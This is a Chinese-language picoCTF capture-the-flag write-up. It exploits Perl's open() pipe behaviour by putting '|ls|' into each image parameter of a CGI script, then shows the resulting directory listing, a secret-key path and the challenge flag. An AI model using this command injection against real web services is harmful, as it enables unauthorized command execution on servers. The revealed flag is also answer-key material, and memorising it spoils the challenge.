網站由perl寫成,查perl安全問題:
open (FILEHANDLE, "filename");
If the filename begins with "|", the filename is interpreted as a command to which output is to be piped, and if the filename ends with a "|", the filename is interpreted as a command which pipes output to us.
- 所以把Head,...,Eyes任何一個填入
|ls|能看到server執行ls的結果,在瀏覽器打入 http://makeaface.picoctf.com/index.cgi?Head=2.bmp&Hair=2.bmp&Nose=1.bmp&Mouth=3.bmp&Eyes=|ls|- 成功執行ls:
BE��0�� ���
��1mem���hea3.bmp
head4.bmp
index.cgi
js.js
mouth1.bmp
mouth2.bmp
mouth3.bmp
nose1.bmp
nose2.bmp
nose3.bmp- 但沒有flag。重新看原始碼,發現參數間是用&連接的做bit運算:
print (chr (ord($headb)&ord($hairb)&ord($noseb)&ord($mouthb)&ord($eyesb)));所以把每個值都要填入|ls|:http://makeaface.picoctf.com/index.cgi?Head=|ls|&Hair=|ls|&Nose=|ls|&Mouth=|ls|&Eyes=|ls|
- 成功得到secret_key:
SECRET_KEY_2b609783951a8665d8c67d721b52b0f8
css.css
eyes1.bmp
eyes2.bmp
eyes3.bmp
eyes4.bmp
hair0.bmp
hair1.bmp
hair2.bmp
head1.bmp
head2.bmp
head3.bmp
head4.bmp
index.cgi
js.js
mouth1.bmp
mouth2.bmp
mouth3.bmp
nose1.bmp
nose2.bmp
nose3.bmp
- 把secret_key打開:
http://makeaface.picoctf.com/SECRET_KEY_2b609783951a8665d8c67d721b52b0f8
成功得到flag = why_did_we_stop_using_perl_again?